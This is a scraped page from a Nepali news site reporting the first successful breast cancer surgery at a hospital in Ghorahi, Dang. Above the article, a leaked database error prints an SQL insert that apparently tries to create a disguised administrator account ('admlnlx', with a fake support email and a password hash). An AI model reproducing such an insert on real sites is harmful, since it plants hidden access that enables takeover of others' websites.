WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTwuTFfAQijxK0OgiMJYFPnBcoEqBo/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 04:10:59', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
दाङमा पहिलो पटक स्तनक्यान्सर रोगको सफल शल्याक्रिया – Gaule Khabar

दाङमा पहिलो पटक स्तनक्यान्सर रोगको सफल शल्याक्रिया

दाङमा पहिलो पटक स्तनक्यान्सर रोगको सफल शल्याक्रिया

दाङ,मंसिर २४ –

दाङ जिल्लामा पहिलो पटक स्तनक्यान्सर रोगको सफल शल्यक्रिया भएको छ । घोराहीस्थित राप्ती उपक्षेत्रीय अस्पतालमा स्तनक्यान्सरको सफल उपचार भएको हो ।

अस्पतालले स्थानीय सैघा गाविस– ५ निवासी ४२ वर्षीया चन्द्रकला थापामगरको स्तनको सफल शल्यक्रिया गरेको अस्पतालका सल्यचिकित्सक डा रमेश बस्नेतले जानकारी दिनुभयो ।
उहाँका अनुसार बिरामी दुई महिनादेखि स्तनक्यान्सरबाट ग्रसित हुनुहुन्थ्यो ।

सो उपचारले जिल्लाका क्यान्सर रोगी उपचारका अन्यत्र जानु पर्दैन भन्दै अस्पताल प्रशासनले रोगीको सेवाका लागि अस्पतालमा प्रयोगशाला र किमो थेरापीको आवश्यकता भएको जनाएको छ ।
सल्यचिकित्सक डा। बस्नेत, रामपुकार शाह र स्टाफ नर्ससहितको चार जनाको टोलीले सो शल्यक्रिया गरेको शल्यक्रिया पछि बिरामी थापा मगर स्वास्थ्य लाभ गरी फर्किसक्नुभएको जनाइएको छ । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका